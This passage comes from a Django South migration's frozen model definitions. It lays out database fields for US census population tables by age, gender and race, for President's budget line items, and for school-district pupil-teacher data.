'age_15_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_20_24': ('django.db.models.fields.IntegerField', [], {}),
'age_20_24_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_25_29': ('django.db.models.fields.IntegerField', [], {}),
'age_25_29_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_30_34': ('django.db.models.fields.IntegerField', [], {}),
'age_30_34_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_35_39': ('django.db.models.fields.IntegerField', [], {}),
'age_35_39_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_40_44': ('django.db.models.fields.IntegerField', [], {}),
'age_40_44_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_45_49': ('django.db.models.fields.IntegerField', [], {}),
'age_45_49_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_50_54': ('django.db.models.fields.IntegerField', [], {}),
'age_50_54_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_55_59': ('django.db.models.fields.IntegerField', [], {}),
'age_55_59_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_9': ('django.db.models.fields.IntegerField', [], {}),
'age_5_9_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_60_64': ('django.db.models.fields.IntegerField', [], {}),
'age_60_64_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_69': ('django.db.models.fields.IntegerField', [], {}),
'age_65_69_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_over': ('django.db.models.fields.IntegerField', [], {}),
'age_65_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_70_74': ('django.db.models.fields.IntegerField', [], {}),
'age_70_74_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_75_79': ('django.db.models.fields.IntegerField', [], {}),
'age_75_79_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_80_84': ('django.db.models.fields.IntegerField', [], {}),
'age_80_84_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_85_over': ('django.db.models.fields.IntegerField', [], {}),
'age_85_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationagestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PopulationAgeState'},
'age_0_19': ('django.db.models.fields.IntegerField', [], {}),
'age_0_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_4': ('django.db.models.fields.IntegerField', [], {}),
'age_0_4_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_10_14': ('django.db.models.fields.IntegerField', [], {}),
'age_10_14_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_15_19': ('django.db.models.fields.IntegerField', [], {}),
'age_15_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_20_24': ('django.db.models.fields.IntegerField', [], {}),
'age_20_24_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_25_29': ('django.db.models.fields.IntegerField', [], {}),
'age_25_29_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_30_34': ('django.db.models.fields.IntegerField', [], {}),
'age_30_34_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_35_39': ('django.db.models.fields.IntegerField', [], {}),
'age_35_39_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_40_44': ('django.db.models.fields.IntegerField', [], {}),
'age_40_44_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_45_49': ('django.db.models.fields.IntegerField', [], {}),
'age_45_49_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_50_54': ('django.db.models.fields.IntegerField', [], {}),
'age_50_54_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_55_59': ('django.db.models.fields.IntegerField', [], {}),
'age_55_59_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_9': ('django.db.models.fields.IntegerField', [], {}),
'age_5_9_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_60_64': ('django.db.models.fields.IntegerField', [], {}),
'age_60_64_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_69': ('django.db.models.fields.IntegerField', [], {}),
'age_65_69_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_65_over': ('django.db.models.fields.IntegerField', [], {}),
'age_65_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_70_74': ('django.db.models.fields.IntegerField', [], {}),
'age_70_74_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_75_79': ('django.db.models.fields.IntegerField', [], {}),
'age_75_79_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_80_84': ('django.db.models.fields.IntegerField', [], {}),
'age_80_84_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_85_over': ('django.db.models.fields.IntegerField', [], {}),
'age_85_over_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationcongressionaldistrict': {
'Meta': {'object_name': 'PopulationCongressionalDistrict'},
'american_indian_alaskan_alone': ('django.db.models.fields.IntegerField', [], {}),
'asian_alone': ('django.db.models.fields.IntegerField', [], {}),
'black_alone': ('django.db.models.fields.IntegerField', [], {}),
'district': ('django.db.models.fields.IntegerField', [], {}),
'hawaiian_pacific_island_alone': ('django.db.models.fields.IntegerField', [], {}),
'households': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'other_alone': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'two_or_more_races': ('django.db.models.fields.IntegerField', [], {}),
'white_alone': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationest00raw': {
'Meta': {'unique_together': "(('state', 'county', 'gender', 'ethnic_origin', 'race'),)", 'object_name': 'PopulationEst00Raw'},
'census2010pop': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ctyname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'estimatesbase2000': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'ethnic_origin': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'popestimate2000': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2001': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2002': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2003': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2004': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2005': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2006': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2007': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2008': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2009': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2010': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'race': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'stname': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'sumlev': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.populationest10raw': {
'Meta': {'unique_together': "(('state', 'county', 'gender', 'ethnic_origin', 'race'),)", 'object_name': 'PopulationEst10Raw'},
'census2010pop': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'census2020pop': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ctyname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'estimatesbase2010': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'ethnic_origin': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'popestimate2010': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2011': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2012': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2013': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2014': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2015': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2016': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2017': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2018': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2019': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'popestimate2020': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'race': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'stname': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'sumlev': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.populationest90raw': {
'Meta': {'unique_together': "(('year', 'state', 'county', 'agegrp', 'race_gender', 'ethnic_origin'),)", 'object_name': 'PopulationEst90Raw'},
'agegrp': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'create_date': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ethnic_origin': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'race_gender': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.populationfamilies': {
'Meta': {'object_name': 'PopulationFamilies'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationgendercounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'PopulationGenderCounty'},
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'female': ('django.db.models.fields.IntegerField', [], {}),
'female_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'male': ('django.db.models.fields.IntegerField', [], {}),
'male_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationgenderstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PopulationGenderState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'female': ('django.db.models.fields.IntegerField', [], {}),
'female_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'male': ('django.db.models.fields.IntegerField', [], {}),
'male_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationracecounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'PopulationRaceCounty'},
'asian_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone': ('django.db.models.fields.IntegerField', [], {}),
'black_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'black_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'multiple_race': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'white_alone': ('django.db.models.fields.IntegerField', [], {}),
'white_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'white_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationracestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PopulationRaceState'},
'asian_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'asian_pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'asian_pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone': ('django.db.models.fields.IntegerField', [], {}),
'black_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'black_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'black_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'multiple_race': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'multiple_race_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'multiple_race_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'native_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'native_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_alone_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'pacific_islander_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'pacific_islander_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'white_alone': ('django.db.models.fields.IntegerField', [], {}),
'white_alone_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_alone_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_alone_percent': ('django.db.models.fields.FloatField', [], {}),
'white_other': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_hispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_nonhispanic': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'white_other_nonhispanic_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_other_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.presidentsbudget': {
'Meta': {'object_name': 'PresidentsBudget'},
'account_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'account_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'agency_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'bea_category': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'budget_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'bureau_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bureau_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'grant_non_grant': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'on_off_budget': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'source_category_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'source_category_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'source_subcategory_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'source_subcategory_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'subfunction_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'subfunction_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'treasury_agency_code': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'data.presidentsbudgetyear': {
'Meta': {'object_name': 'PresidentsBudgetYear'},
'budget': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'years'", 'to': "orm['data.PresidentsBudget']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '4'})
},
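        # The related_name 'years' on PresidentsBudgetYear.budget exposes the
        # per-year amounts of a budget line as a reverse manager; hypothetical
        # usage (not part of this migration, lookup value illustrative only):
        #
        #     line = PresidentsBudget.objects.get(account_name='Example account')
        #     by_year = {y.year: y.value for y in line.years.all()}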
'data.pupilteacherdistrict': {
'Meta': {'object_name': 'PupilTeacherDistrict'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
